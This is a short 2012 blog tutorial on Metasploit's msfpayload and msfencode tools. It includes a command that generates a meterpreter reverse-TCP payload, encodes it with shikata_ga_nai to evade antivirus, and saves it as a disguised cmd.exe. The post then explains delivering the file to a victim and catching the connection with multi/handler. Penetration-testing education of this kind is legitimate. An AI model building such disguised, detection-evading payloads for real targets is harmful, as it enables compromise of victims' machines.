Monday, February 27, 2012

MSFpayload & MSFencode

Again, in this post I'll explain some of the metasploit features..  :)

- MsfPayload
msfpayload is the metasploit tool to generate a payload for the exploit. Its function is the same as msfweb that I use in my other posts, but this tool is in console, so its rather difficult for newbies to use. But with regular training, this tool is better than msfweb because it greatly save time and RAM space. 
# msfpayload -h

- MsfEncode
msfencode is the tool to encode an application source code into a different form but with a same function. The form of the code after encoded is based on its encoder. Msfencode have many encoder, but the one that I think the best is the Shikata_Ga_Nai encoder. This encoder usually combined with the payload that will be sent and executed together with the exploit. A payload must be encoded before executed.
Why? Because antivirus nowadays can detect wheter a file contains payload or not, If the antivirus found out that the fingerprint of the payload is the same as its payload database, its 90% sure that the antivirus will prevent the payload to be executed on the system.
# msfencode -h

Here's an example how to combine msfpayload and msfencode to create a malicious file that contain our payload.
# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4321 R | msfencode -e x86/shikata_ga_nai -t exe >/var/www/files/cmd.exe

- What does the command above done?
It will create a payload using meterpreter_reverse_tcp then the msfencode will encode it to make it undetectable from the antivirus and create a file called cmd.exe. This file contains our payload. So we need to transfer it to the victims computer using meterpreter, netcat, ftp, or any other tool. Whenever the victim execute this file, the payload that we've injected into the file will runs too.

- After that we only need to prepare and decide the right way to handle the payload. Reverse connection means that we are the server, we are the one that open a port an listen for the connection. Bind connection means we're the client, we connect to the victim's ip address. 
In this post the payload that I use is meterpreter_reverse-tcp, so to handle this payload I only need to prepare the handler in metasploit using the /multi/handler modules. Other types of payload, means other way to handle it too.

Hope this can help you understand better about the metasploit features especially msfpayload and msfencode..  ^_^v

"the quieter you become, the more you are able to hear.."


Post a Comment